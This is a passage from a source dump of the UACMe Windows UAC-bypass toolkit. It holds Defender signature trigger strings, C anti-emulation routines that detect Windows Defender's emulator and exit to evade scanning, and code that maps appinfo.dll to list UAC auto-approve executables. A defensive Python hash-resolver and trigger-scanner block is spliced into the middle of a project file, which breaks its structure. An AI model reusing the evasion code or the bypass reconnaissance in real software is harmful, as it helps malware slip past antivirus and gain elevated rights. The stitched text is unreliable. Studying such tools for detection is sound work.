UACMe injected, Hibiki at your service.
ucmLoadCallback, kernel32 base found

HackTool:Win64/UACMe.A!MSR

Triggers:

\REGISTRY\MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\UAC\COMAutoApprovalList
run /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /i
"UACMe main module
UAC is now disabled.\nYou must reboot your computer for the changes to take effect.
_FubukiProc4
UACMe v3.1.9.1905
\Software\KureND
ArisuTsuberuku
AkagiCompletionEvent
AkagiSharedSection

HackTool:Win32/Fubuki!MTB

Triggers:

AkagiSharedSection
system32\
_FubukiProc2
mmc.exe
\?\globalroot\systemroot\system32\sysprep\unbcl
CorBindToRuntimeEx
CreateUri

*/

DWORD wdxEmulatorAPIHashTable[] = {
    0x70CE7692,
    0xD4CE4554,
    0x7A99CFAE
};

PVOID wdxGetProcedureAddressByHash(
    _In_ PVOID ImageBase,
    _In_ DWORD ProcedureHash);

/*
* wdxGetHashForString
*
* Purpose:
*
* Calculates specific hash for string.
*
*/
DWORD wdxGetHashForString(
    _In_ char *s
)
{
    DWORD h = 0;

    while (*s != 0) {
        h ^= *s;
        h = RotateLeft32(h, 3) + 1;
        s++;
    }

    return h;
}

/*
* wdxGetProcedureAddressByHash
*
* Purpose:
*
* Return pointer to function in MpClient from name hash value.
*
*/
PVOID wdxGetProcedureAddressByHash(
    _In_ PVOID ImageBase,
    _In_ DWORD ProcedureHash
)
{
    DWORD i;
    ULONG sz = 0;
    IMAGE_DOS_HEADER *DosHeader;
    IMAGE_EXPORT_DIRECTORY *Exports;
    PDWORD Names, Functions;
    PWORD Ordinals;
    DWORD_PTR FunctionPtr;

    if (ImageBase == NULL)
        return NULL;

    DosHeader = (IMAGE_DOS_HEADER*)ImageBase;
    if (DosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        return NULL;

    Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, TRUE,
        IMAGE_DIRECTORY_ENTRY_EXPORT, &sz);
    if (Exports == NULL)
        return NULL;

    Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);
    Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals);
    Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions);

    for (i = 0; i < Exports->NumberOfNames; i++) {
        if (wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i])) == ProcedureHash) {
            FunctionPtr = Functions[Ordinals[i]];
            return (PBYTE)ImageBase + FunctionPtr;
        }
    }

    return NULL;
}

/*
* wdCheckEmulatedVFS
*
* Purpose:
*
* Detect Microsoft Security Engine emulation by its own VFS artefact.
*
* Microsoft AV provides a special emulated environment for the scanned application where it
* fakes general system information and process environment structures/data to make sure
* API calls are transparent for the scanned code. It also uses a simple Virtual File System,
* allowing the AV to track file system changes and, if needed, continue emulation on a new target.
*
* This method has been implemented in commercial malware, presumably since 2013.
*
*/
VOID wdCheckEmulatedVFS(
    VOID
)
{
    WCHAR szBuffer[MAX_PATH];
    WCHAR szMsEngVFS[12] = { L':', L'\\', L'm', L'y', L'a', L'p', L'p', L'.', L'e', L'x', L'e', 0 };

    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
    if (GetModuleFileName(NULL, szBuffer, MAX_PATH)) {
        if (_strstri(szBuffer, szMsEngVFS) != NULL) {
            RtlExitUserProcess((UINT)0);
        }
    }
}

/*
* wdIsEmulatorPresent
*
* Purpose:
*
* Detect MS emulator state.
*
*/
NTSTATUS wdIsEmulatorPresent(
    VOID)
{
    PCHAR ImageBase = NULL;
    IMAGE_DOS_HEADER *DosHeader;
    IMAGE_EXPORT_DIRECTORY *Exports;
    PDWORD Names;
    ULONG i, c, Hash, sz = 0;
    UNICODE_STRING usNtdll = RTL_CONSTANT_STRING(L"ntdll.dll");

    if (!NT_SUCCESS(LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,
        NULL, NULL, &usNtdll, &ImageBase)))
    {
        return STATUS_DLL_NOT_FOUND;
    }

    if (ImageBase == NULL)
        return STATUS_DLL_NOT_FOUND;

    Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, TRUE,
        IMAGE_DIRECTORY_ENTRY_EXPORT, &sz);
    if (Exports == NULL)
        return STATUS_INVALID_IMAGE_FORMAT;

    DosHeader = (IMAGE_DOS_HEADER*)ImageBase;
    Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);

    for (i = 0; i < Exports->NumberOfNames; i++) {
        Hash = wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i]));
        for (c = 0; c < RTL_NUMBER_OF(wdxEmulatorAPIHashTable); c++) {
            if (Hash == wdxEmulatorAPIHashTable[c])
                return STATUS_NEEDS_REMEDIATION;
        }
    }

    return STATUS_NOT_SUPPORTED;
}

/*
* wdIsEmulatorPresent2
*
* Purpose:
*
* Detect MS emulator state 2.
*
* Microsoft AV defines virtual environment dlls loaded in runtime from VDM files.
* These fake libraries implement additional detection layer and come with a lot of
* predefined values.
*
*/
BOOLEAN wdIsEmulatorPresent2(
    VOID)
{
    return NtIsProcessInJob(NtCurrentProcess(), UlongToHandle(10)) == 0x125;
}

/*
* wdIsEmulatorPresent3
*
* Purpose:
*
* Same as previous.
*
*/
BOOLEAN wdIsEmulatorPresent3(
    VOID)
{
    if (NT_SUCCESS(NtCompressKey(UlongToHandle(0xFFFF1234))))
        return TRUE;

    return FALSE;
}

#pragma warning(pop)

================================================
FILE: Source/Shared/windefend.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2020
*
*  TITLE:       WINDEFEND.H
*
*  VERSION:     3.50
*
*  DATE:        05 Oct 2020
*
*  MSE / Windows Defender anti-emulation part header file.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

VOID wdCheckEmulatedVFS(
    VOID);

NTSTATUS wdIsEmulatorPresent(
    VOID);

BOOLEAN wdIsEmulatorPresent2(
    VOID);

BOOLEAN wdIsEmulatorPresent3(
    VOID);

================================================
FILE: Source/Yuubari/Yuubari.vcxproj
================================================
Debug x64 ReleaseInternal x64 Release x64 {304D5A8A-EF98-4E21-8F4D-91E66E0BECAC} Win32Proj Yuubari 10.0 Application true v145 Unicode false Application false v145 true Unicode false Application false v145 true Unicode false true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ AllRules.ruleset false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ UacInfo64 AllRules.ruleset false false .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ UacInfo64 SecurityRules.ruleset true Level4 Disabled _DEBUG;_WINDOWS;%(PreprocessorDefinitions) true CompileAsC $(ProjectDir);$(SolutionDir) Console true main 6.0 Level4 MaxSpeed true true NDEBUG;_WINDOWS;%(PreprocessorDefinitions) true CompileAsC MultiThreaded Guard true $(ProjectDir);$(SolutionDir) false true Console true true false main true
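Two analyst-side helpers for the windefend.c material above, written as an added example and not part of UACME: a port of the export-name hash that `wdxGetHashForString` computes (XOR the byte in, rotate left by 3, add 1, all modulo 2^32) together with a resolver that maps a hash table like `wdxEmulatorAPIHashTable` back to names when fed a candidate export list (for instance the export names dumped from a copy of ntdll.dll with any PE tool), and a scanner that looks for the Windows Defender trigger strings quoted in the signature comment in both ASCII and UTF-16LE, since the comment shows several of them as wide strings. The candidate names, the hash values in the self-test and `SAMPLE_BLOB` are constructed for the demonstration; the real table values are the three constants on the page, which are deliberately not resolved here.

```python
"""Analyst helpers (added example, not UACME code): API-hash resolution for the
wdxGetHashForString scheme and a string-based trigger scanner."""
from __future__ import annotations

MASK32 = 0xFFFFFFFF


def wdx_hash(name: str) -> int:
    """Port of wdxGetHashForString: per byte, h ^= c; h = rol32(h, 3) + 1.

    The C code reads a signed char, so bytes >= 0x80 would sign-extend before
    the XOR; export names are ASCII, so that case is not modelled here.
    """
    h = 0
    for byte in name.encode("ascii"):
        h ^= byte
        h = ((h << 3) & MASK32) | (h >> 29)   # RotateLeft32(h, 3)
        h = (h + 1) & MASK32                   # + 1 with DWORD wrap-around
    return h


def resolve_hashes(candidates, hashes) -> dict[int, str]:
    """Map every hash in `hashes` to the first candidate name that produces it.

    `candidates` is the export-name list of the module the sample walks
    (wdIsEmulatorPresent walks ntdll's export table); unmatched hashes are
    simply absent from the result.
    """
    wanted = set(hashes)
    resolved: dict[int, str] = {}
    for name in candidates:
        h = wdx_hash(name)
        if h in wanted and h not in resolved:
            resolved[h] = name
    return resolved


# Trigger strings copied from the WD signature comment in windefend.c.
TRIGGER_STRINGS = (
    "UACMe injected, Hibiki at your service.",
    "ucmLoadCallback, dll load %ws, DllBase = %p",
    "ucmLoadCallback, kernel32 base found",
    "AkagiCompletionEvent",
    "AkagiSharedSection",
    "_FubukiProc2",
    "_FubukiProc4",
    "mmc.exe",
    "CorBindToRuntimeEx",
)


def scan_for_triggers(data: bytes, patterns=TRIGGER_STRINGS):
    """Return (pattern, encoding, offset) for every ASCII or UTF-16LE hit.

    Searching both encodings matters because a wide-string literal in the
    binary never matches its ASCII spelling, as the spaced-out entries in the
    Bampeass.A trigger list illustrate.
    """
    hits = []
    for text in patterns:
        for enc in ("ascii", "utf-16-le"):
            needle = text.encode(enc)
            start = 0
            while True:
                idx = data.find(needle, start)
                if idx < 0:
                    break
                hits.append((text, enc, idx))
                start = idx + 1
    hits.sort(key=lambda hit: hit[2])
    return hits


# Constructed sample blob (hypothetical, not a real UACME binary): four padding
# bytes, a wide "AkagiSharedSection", two filler bytes, an ASCII "_FubukiProc2".
SAMPLE_BLOB = (
    b"\x00" * 4
    + "AkagiSharedSection".encode("utf-16-le")
    + b"xx"
    + b"_FubukiProc2"
    + b"\x00"
)


if __name__ == "__main__":
    for text, enc, offset in scan_for_triggers(SAMPLE_BLOB):
        print(f"{offset:#06x} {enc:9s} {text}")
    # Constructed candidate list: with the real ntdll export names in place of
    # these, pass the three constants from wdxEmulatorAPIHashTable instead.
    print(resolve_hashes(["A", "AB", "C"], [wdx_hash("A"), wdx_hash("AB")]))
```

Running the block on a real file means `scan_for_triggers(open(path, "rb").read())`; the hash resolver is only as good as the candidate list, so feed it the full export list of the module version the sample was built against.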
6.0 /NOCOFFGRPINFO %(AdditionalOptions) Level4 MinSpace true true NDEBUG;_WINDOWS;%(PreprocessorDefinitions) true CompileAsC MultiThreaded Guard true $(ProjectDir);$(SolutionDir) true true Size Console true true false main true 6.0 /NOCOFFGRPINFO %(AdditionalOptions) \Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\UacInfo64.exe

================================================
FILE: Source/Yuubari/Yuubari.vcxproj.filters
================================================
{4FC737F1-C7A5-4376-A066-2A32D752A2FF} cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx {93995380-89BD-4b04-88EB-625FBE52EBFB} h;hh;hpp;hxx;hm;inl;inc;xsd {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms {336547cc-9eeb-4b6e-affd-aa70e6f7bfba} {c345b77b-4418-4498-8377-bcbbbc11aa76} {feac226e-813e-438e-a68d-49e68ad8f8bb} Source Files Source Files minirtl minirtl minirtl minirtl Source Files Source Files minirtl minirtl minirtl minirtl Source Files Source Files Source Files minirtl minirtl Source Files testunits minirtl hde minirtl minirtl Header Files Header Files Header Files Header Files Header Files Header Files Header Files Header Files Header Files Header Files minirtl Header Files Header Files testunits Header Files minirtl hde hde hde Resource Files Resource Files

================================================
FILE: Source/Yuubari/Yuubari.vcxproj.user
================================================
WindowsLocalDebugger WindowsLocalDebugger WindowsLocalDebugger

================================================
FILE: Source/Yuubari/appinfo.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2025
*
*  TITLE:       APPINFO.C
*
*  VERSION:     1.60
*
*  DATE:        17 Jun 2025
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #include "global.h" #pragma comment(lib, "version.lib") #define DEFAULT_SYMPATH L"*https://msdl.microsoft.com/download/symbols" #define TEXT_SECTION ".text" #define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION) #define RDATA_SECTION ".rdata" #define RDATA_SECTION_LENGTH sizeof(RDATA_SECTION) #define TestChar(x) (((WCHAR)x >= L'A') && ((WCHAR)x <= L'z')) /* * GetAppInfoBuildVersion * * Purpose: * * Return build number of AppInfo. * */ BOOL GetAppInfoBuildVersion( _In_ LPWSTR lpFileName, _Out_ ULONG* BuildNumber ) { BOOL bResult = FALSE; DWORD dwHandle, dwSize; PVOID vinfo = NULL; UINT Length; VS_FIXEDFILEINFO* pFileInfo; *BuildNumber = 0; dwHandle = 0; dwSize = GetFileVersionInfoSize(lpFileName, &dwHandle); if (dwSize) { vinfo = supHeapAlloc(dwSize); if (vinfo) { if (GetFileVersionInfo(lpFileName, 0, dwSize, vinfo)) { bResult = VerQueryValue(vinfo, TEXT("\\"), (LPVOID*)&pFileInfo, (PUINT)&Length); if (bResult) { *BuildNumber = HIWORD(pFileInfo->dwFileVersionLS); } } supHeapFree(vinfo); } } return bResult; } /* * LookupAddressBySymbol * * Purpose: * * Return address of symbol by name. * */ ULONG64 LookupAddressBySymbol( _In_ pfnSymFromNameW SymFromName, _In_ LPCWSTR SymbolName, _Out_opt_ PBOOL Status ) { BOOL bStatus = FALSE; SIZE_T symSize; ULONG64 symAddress = 0; PSYMBOL_INFOW symbolInfo = NULL; symSize = sizeof(SYMBOL_INFOW); symbolInfo = (PSYMBOL_INFOW)supHeapAlloc(symSize); if (symbolInfo) { symbolInfo->SizeOfStruct = sizeof(SYMBOL_INFOW); symbolInfo->MaxNameLen = 0; //name is not used bStatus = SymFromName( GetCurrentProcess(), SymbolName, symbolInfo); if (bStatus) symAddress = symbolInfo->Address; supHeapFree(symbolInfo); } if (Status) *Status = bStatus; return symAddress; } /* * ResolveAppInfoSymbols * * Purpose: * * Load dbghelp, resolve appinfo pointers through symbols lookup. 
* */ BOOL ResolveAppInfoSymbols( _In_ PUAC_AI_GLOBALS AppInfo ) { SIZE_T dirLength; WCHAR szBuffer[MAX_PATH * 2]; WCHAR szUserSearchPath[MAX_PATH * 2]; HANDLE dllHandle; HANDLE processHandle = GetCurrentProcess(); DWORD64 baseOfDll; pfnSymInitializeW pSymInitialize; pfnSymSetOptions pSymSetOptions; pfnSymLoadModuleExW pSymLoadModuleEx; pfnSymFromNameW pSymFromName; pfnSymUnloadModule64 pSymUnloadModule64; pfnSymCleanup pSymCleanup; RtlSecureZeroMemory(szBuffer, sizeof(szBuffer)); if (GetModuleFileName(NULL, szBuffer, MAX_PATH) == 0) return FALSE; _filepath(szBuffer, szBuffer); _strcat(szBuffer, TEXT("symdll\\")); dirLength = _strlen(szBuffer); _strcat(szBuffer, TEXT("dbghelp.dll")); dllHandle = LoadLibrary(szBuffer); if (dllHandle == NULL) return FALSE; /*szBuffer[dirLength] = 0; _strcat(szBuffer, TEXT("symsrv.dll")); LoadLibrary(szBuffer);*/ pSymInitialize = (pfnSymInitializeW)GetProcAddress(dllHandle, "SymInitializeW"); if (pSymInitialize == NULL) return FALSE; pSymSetOptions = (pfnSymSetOptions)GetProcAddress(dllHandle, "SymSetOptions"); if (pSymSetOptions == NULL) return FALSE; pSymLoadModuleEx = (pfnSymLoadModuleExW)GetProcAddress(dllHandle, "SymLoadModuleExW"); if (pSymLoadModuleEx == NULL) return FALSE; pSymFromName = (pfnSymFromNameW)GetProcAddress(dllHandle, "SymFromNameW"); if (pSymFromName == NULL) return FALSE; pSymUnloadModule64 = (pfnSymUnloadModule64)GetProcAddress(dllHandle, "SymUnloadModule64"); if (pSymUnloadModule64 == NULL) return FALSE; pSymCleanup = (pfnSymCleanup)GetProcAddress(dllHandle, "SymCleanup"); if (pSymCleanup == NULL) return FALSE; pSymSetOptions(SYMOPT_DEFERRED_LOADS | SYMOPT_UNDNAME); szBuffer[dirLength] = 0; _strcat(szBuffer, TEXT("Symbols")); if (!CreateDirectory((LPCWSTR)&szBuffer, NULL)) if (GetLastError() != ERROR_ALREADY_EXISTS) return FALSE; _strcpy(szUserSearchPath, TEXT("SRV*")); _strcat(szUserSearchPath, szBuffer); _strcat(szUserSearchPath, DEFAULT_SYMPATH); processHandle = GetCurrentProcess(); if 
(pSymInitialize(processHandle, szUserSearchPath, FALSE)) { baseOfDll = pSymLoadModuleEx(processHandle, NULL, TEXT("appinfo.dll"), NULL, (DWORD64)AppInfo->DllBase, 0, NULL, 0); if (baseOfDll) { AppInfo->lpAutoApproveEXEList = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpAutoApproveEXEList"), NULL); AppInfo->lpIncludedPFDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpIncludedPFDirs"), NULL); AppInfo->lpIncludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpIncludedWindowsDirs"), NULL); AppInfo->lpIncludedSystemDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpIncludedSystemDirs"), NULL); AppInfo->lpExemptedAutoApproveExes = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpExemptedAutoApproveExes"), NULL); AppInfo->lpExcludedWindowsDirs = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpExcludedWindowsDirs"), NULL); AppInfo->lpAutoApproveEXEList = (PVOID*)LookupAddressBySymbol(pSymFromName, TEXT("g_lpAutoApproveEXEList"), NULL); pSymUnloadModule64(processHandle, baseOfDll); pSymCleanup(processHandle); return TRUE; } } return FALSE; } PVOID AipFindMSBlockInSection( _In_ PVOID DllBase, _In_ IMAGE_SECTION_HEADER* SectionTableEntry, _In_ ULONG_PTR PatternValue ) { PBYTE SectionBase; ULONG SectionSize, Offset; ULONG_PTR TestValue; PVOID RefPointer = NULL, pvMmcBlock = NULL; SectionBase = (PBYTE)RtlOffsetToPointer(DllBase, SectionTableEntry->VirtualAddress); SectionSize = SectionTableEntry->Misc.VirtualSize; for (Offset = 0; Offset < SectionSize - sizeof(ULONG_PTR); Offset++) { RefPointer = SectionBase + Offset; TestValue = *(PULONG_PTR)RefPointer; if (TestValue == PatternValue) { pvMmcBlock = (PVOID)RefPointer; break; } } return pvMmcBlock; } /* * AipQueryMSBlock * * Purpose: * * Locate mmc block. 
* */ BOOLEAN AipQueryMSBlock( _In_ UAC_AI_GLOBALS* AppInfo ) { ULONG i; ULONG SectionSize; ULONG_PTR PatternValue = 0; PVOID pvMmcBlock = NULL; PBYTE SectionBase; IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(AppInfo->DllBase); IMAGE_SECTION_HEADER* SectionTableEntry, * RDataTableEntry = NULL; WCHAR szSignature[] = L"mmc.exe"; SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders); for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) { SectionBase = (PBYTE)RtlOffsetToPointer(AppInfo->DllBase, SectionTableEntry->VirtualAddress); SectionSize = SectionTableEntry->Misc.VirtualSize; PatternValue = (ULONG_PTR)supFindPattern(SectionBase, SectionSize, (CONST PBYTE)szSignature, sizeof(szSignature)); if (PatternValue) break; } if (PatternValue == 0) return FALSE; SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders); for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) { if (_strncmp_a( (CHAR*)SectionTableEntry->Name, RDATA_SECTION, RDATA_SECTION_LENGTH) == 0) { RDataTableEntry = SectionTableEntry; break; } } if (RDataTableEntry) { pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase, RDataTableEntry, PatternValue); } else { SectionTableEntry = IMAGE_FIRST_SECTION(NtHeaders); for (i = 0; i < NtHeaders->FileHeader.NumberOfSections; i++, SectionTableEntry++) { pvMmcBlock = AipFindMSBlockInSection(AppInfo->DllBase, SectionTableEntry, PatternValue); if (pvMmcBlock) break; } } if (pvMmcBlock) { AppInfo->MmcBlock = pvMmcBlock; return TRUE; } return FALSE; } BOOL IsCrossPtr( _In_ UAC_AI_GLOBALS* AppInfo, _In_ ULONG_PTR Ptr, _In_ ULONG_PTR CurrentList ) { if (Ptr == 0 || AppInfo == NULL) { return TRUE; } if (!IN_REGION(Ptr, AppInfo->DllBase, AppInfo->DllVirtualSize)) { return TRUE; } if (AppInfo->lpAutoApproveEXEList) { if (CurrentList != (ULONG_PTR)AppInfo->lpAutoApproveEXEList) if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpAutoApproveEXEList[0]) return TRUE; } if (AppInfo->lpExcludedWindowsDirs) { if (CurrentList != 
(ULONG_PTR)AppInfo->lpExcludedWindowsDirs) if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExcludedWindowsDirs[0]) return TRUE; } if (AppInfo->lpExemptedAutoApproveExes) { if (CurrentList != (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes) if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpExemptedAutoApproveExes[0]) return TRUE; } if (AppInfo->lpIncludedPFDirs) { if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedPFDirs) if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedPFDirs[0]) return TRUE; } if (AppInfo->lpIncludedSystemDirs) { if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedSystemDirs) if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedSystemDirs[0]) return TRUE; } if (AppInfo->lpIncludedWindowsDirs) { if (CurrentList != (ULONG_PTR)AppInfo->lpIncludedWindowsDirs) if ((ULONG_PTR)Ptr == (ULONG_PTR)AppInfo->lpIncludedWindowsDirs[0]) return TRUE; } return FALSE; } /* * ListMMCFiles * * Purpose: * * Output MMC related block from appinfo.dll. * */ VOID ListMMCFiles( _In_ UAC_AI_GLOBALS* AppInfo, _In_ OUTPUTCALLBACK OutputCallback ) { SIZE_T i, Length; LPWSTR TestString = NULL; PVOID* MscArray = NULL; UAC_AI_DATA CallbackData; if (!AipQueryMSBlock(AppInfo)) return; __try { if (AppInfo->MmcBlock->NumOfElements == 0 || AppInfo->MmcBlock->NumOfElements > 256) { OutputDebugString(TEXT("Invalid block data")); } else { CallbackData.Type = AiManagementConsole; TestString = AppInfo->MmcBlock->lpManagementApplication; if (TestString) { if (IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize)) { CallbackData.Name = TestString; CallbackData.Length = _strlen(TestString); OutputCallback((PVOID)&CallbackData); } } CallbackData.Type = AiSnapinFile; MscArray = (PVOID*)AppInfo->MmcBlock->Base; for (i = 0; i < AppInfo->MmcBlock->NumOfElements; i++) { TestString = (LPWSTR)MscArray[i]; if (TestString != NULL) { if (IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize)) { Length = _strlen(TestString); CallbackData.Name = TestString; CallbackData.Length = Length; 
                        OutputCallback((PVOID)&CallbackData);
                    }
                }
            }
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        OutputDebugString(TEXT("Invalid block"));
        return;
    }
}

/*
* ListAutoApproveEXE
*
* Purpose:
*
* Output lpAutoApproveEXE list from appinfo.dll.
*
*/
VOID ListAutoApproveEXE(
    _In_ UAC_AI_GLOBALS* AppInfo,
    _In_ OUTPUTCALLBACK OutputCallback
)
{
    BOOL bValidEntry;
    WCHAR k, lk;
    SIZE_T i, Length = 0;
    LPWSTR TestString = NULL;
    UAC_AI_DATA CallbackData;
    SIZE_T MaxEntries = 100;

    if (AppInfo->lpAutoApproveEXEList == NULL)
        return;

    CallbackData.Type = AiAutoApproveEXE;

    i = 0;
    k = 0;
    lk = 0;

    __try {

        do {

            if (i >= MaxEntries)
                break;

            TestString = (LPWSTR)AppInfo->lpAutoApproveEXEList[i];

            if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)AppInfo->lpAutoApproveEXEList))
                break;

            if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))
                break;

            bValidEntry = FALSE;

            __try {
                k = TestString[0];
                bValidEntry = TestChar(k);
            }
            __except (EXCEPTION_EXECUTE_HANDLER) {
                break;
            }

            if (!bValidEntry)
                break;

            // List is sorted, a first character lower than the previous one means the end of it.
            if (k < lk)
                break;

            lk = k;
            i += 1;

            __try {
                Length = _strlen(TestString);
                if (Length > MAX_PATH * 2) {
                    continue;
                }
            }
            __except (EXCEPTION_EXECUTE_HANDLER) {
                continue;
            }

            Length = _strlen(TestString);
            CallbackData.Length = Length;
            CallbackData.Name = TestString;
            OutputCallback((PVOID)&CallbackData);

        } while (1);

    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        OutputDebugString(TEXT("Invalid pointer, enum stop"));
        return;
    }
}

/*
* ListStringDataUnsorted
*
* Purpose:
*
* Output unsorted string data from appinfo.dll.
*
*/
VOID ListStringDataUnsorted(
    UAC_AI_GLOBALS* AppInfo,
    AI_DATA_TYPE AiDataType,
    PVOID* Data,
    OUTPUTCALLBACK OutputCallback
)
{
    BOOL bValidEntry = FALSE;
    SIZE_T i, Length = 0, MaxEntries = 100;
    LPWSTR TestString = NULL;
    UAC_AI_DATA CallbackData;

    if (Data == NULL)
        return;

    CallbackData.Type = AiDataType;
    i = 0;

    __try {

        do {

            if (i >= MaxEntries)
                break;

            TestString = (LPWSTR)Data[i];

            if (IsCrossPtr(AppInfo, (ULONG_PTR)TestString, (ULONG_PTR)Data))
                break;

            if (!IN_REGION(TestString, AppInfo->DllBase, AppInfo->DllVirtualSize))
                break;

            bValidEntry = FALSE;

            __try {
                bValidEntry = TestChar(TestString[0]);
            }
            __except (EXCEPTION_EXECUTE_HANDLER) {
                break;
            }

            if (!bValidEntry)
                break;

            i += 1;

            __try {
                Length = _strlen(TestString);
                if (Length > MAX_PATH * 2) {
                    continue;
                }
            }
            __except (EXCEPTION_EXECUTE_HANDLER) {
                continue;
            }

            Length = _strlen(TestString);
            CallbackData.Length = Length;
            CallbackData.Name = TestString;
            OutputCallback((PVOID)&CallbackData);

        } while (1);

    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        OutputDebugString(TEXT("Invalid pointer, enum stop"));
        return;
    }
}

/*
* ScanAppInfo
*
* Purpose:
*
* Map appinfo.dll and extract various information from it.
*
*/
VOID ScanAppInfo(
    LPWSTR lpFileName,
    OUTPUTCALLBACK OutputCallback
)
{
    NTSTATUS status;
    HANDLE hFile = NULL, hSection = NULL;
    PBYTE DllBase = NULL;
    SIZE_T DllVirtualSize;
    OBJECT_ATTRIBUTES attr;
    UNICODE_STRING usFileName;
    IO_STATUS_BLOCK iosb;
    UAC_AI_GLOBALS AppInfo;

    RtlSecureZeroMemory(&AppInfo, sizeof(AppInfo));
    RtlInitEmptyUnicodeString(&usFileName, NULL, 0);

    do {

        //
        // Due to brilliant MS design all newest versions have the same build in file version attributes.
        //
        if (g_NtBuildNumber >= NT_WIN10_19H1) {
            AppInfo.AppInfoBuildNumber = g_NtBuildNumber;
        }
        else {
            if (!GetAppInfoBuildVersion(lpFileName, &AppInfo.AppInfoBuildNumber))
                break;
        }

        if (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)
            break;

        InitializeObjectAttributes(&attr, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);
        RtlSecureZeroMemory(&iosb, sizeof(iosb));

        status = NtCreateFile(&hFile,
            SYNCHRONIZE | FILE_READ_DATA,
            &attr,
            &iosb,
            NULL,
            0,
            FILE_SHARE_READ,
            FILE_OPEN,
            FILE_SYNCHRONOUS_IO_NONALERT,
            NULL,
            0);

        if (!NT_SUCCESS(status))
            break;

        // Read-only image section: the DLL is mapped for inspection only, never executed.
        status = NtCreateSection(&hSection,
            SECTION_ALL_ACCESS,
            NULL,
            NULL,
            PAGE_READONLY,
            SEC_IMAGE,
            hFile);

        if (!NT_SUCCESS(status))
            break;

        DllBase = NULL;
        DllVirtualSize = 0;

        status = NtMapViewOfSection(hSection,
            NtCurrentProcess(),
            (PVOID*)&DllBase,
            0,
            0,
            NULL,
            &DllVirtualSize,
            ViewUnmap,
            0,
            PAGE_READONLY);

        if (!NT_SUCCESS(status))
            break;

        AppInfo.DllBase = DllBase;
        AppInfo.DllVirtualSize = DllVirtualSize;

        ListMMCFiles(&AppInfo, OutputCallback);

        if (ResolveAppInfoSymbols(&AppInfo)) {
            ListAutoApproveEXE(&AppInfo, OutputCallback);
            ListStringDataUnsorted(&AppInfo, AiIncludedPFDirs, AppInfo.lpIncludedPFDirs, OutputCallback);
            ListStringDataUnsorted(&AppInfo, AilpIncludedWindowsDirs, AppInfo.lpIncludedWindowsDirs, OutputCallback);
            ListStringDataUnsorted(&AppInfo, AiIncludedSystemDirs, AppInfo.lpIncludedSystemDirs, OutputCallback);
            ListStringDataUnsorted(&AppInfo, AiExemptedAutoApproveExes, AppInfo.lpExemptedAutoApproveExes, OutputCallback);
